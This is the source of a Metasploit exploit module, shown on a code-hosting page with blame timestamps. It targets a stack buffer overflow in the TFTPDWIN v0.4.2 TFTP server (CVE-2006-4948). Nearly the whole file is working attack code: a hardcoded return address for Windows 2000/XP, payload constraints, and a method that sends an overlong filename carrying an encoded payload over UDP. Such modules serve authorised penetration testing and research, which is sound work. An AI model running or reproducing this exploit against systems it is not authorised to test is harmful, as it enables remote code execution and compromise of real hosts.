metasploit-framework/modules/exploits/windows/tftp/tftpdwin_long_filename.rb

66 lines
1.7 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 21:28:54 +00:00
Rank = GreatRanking
2013-08-30 21:28:54 +00:00
include Msf::Exploit::Remote::Udp
2013-08-30 21:28:54 +00:00
def initialize(info = {})
super(update_info(info,
'Name' => 'TFTPDWIN v0.4.2 Long Filename Buffer Overflow',
'Description' => %q{
This module exploits the ProSysInfo TFTPDWIN threaded TFTP Server. By sending
an overly long file name to the tftpd.exe server, the stack can be overwritten.
},
'Author' => [ 'patrick' ],
'References' =>
[
[ 'CVE', '2006-4948' ],
[ 'OSVDB', '29032' ],
2013-08-30 21:28:54 +00:00
[ 'BID', '20131' ],
[ 'EDB', '3132' ],
2013-08-30 21:28:54 +00:00
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 284,
'BadChars' => "\x00",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Patrick - Tested OK 2007/10/02 w2ksp0, w2ksp4, xpsp0, xpsp2 en
[ 'Universal - tftpd.exe', { 'Ret' => 0x00458b91 } ] # pop edx / ret tftpd.exe
],
'Privileged' => false,
'DisclosureDate' => 'Sep 21 2006',
'DefaultTarget' => 0))
2013-08-30 21:28:54 +00:00
register_options(
[
Opt::RPORT(69),
], self)
end
2013-08-30 21:28:54 +00:00
def exploit
connect_udp
2013-08-30 21:28:54 +00:00
print_status("Trying target #{target.name}...")
sploit = "\x00\x02" + payload.encoded + [target['Ret']].pack('V')
sploit << "netascii\x00" # The first null byte is borrowed for the target return address :)
udp_sock.put(sploit)
2013-08-30 21:28:54 +00:00
disconnect_udp
end
end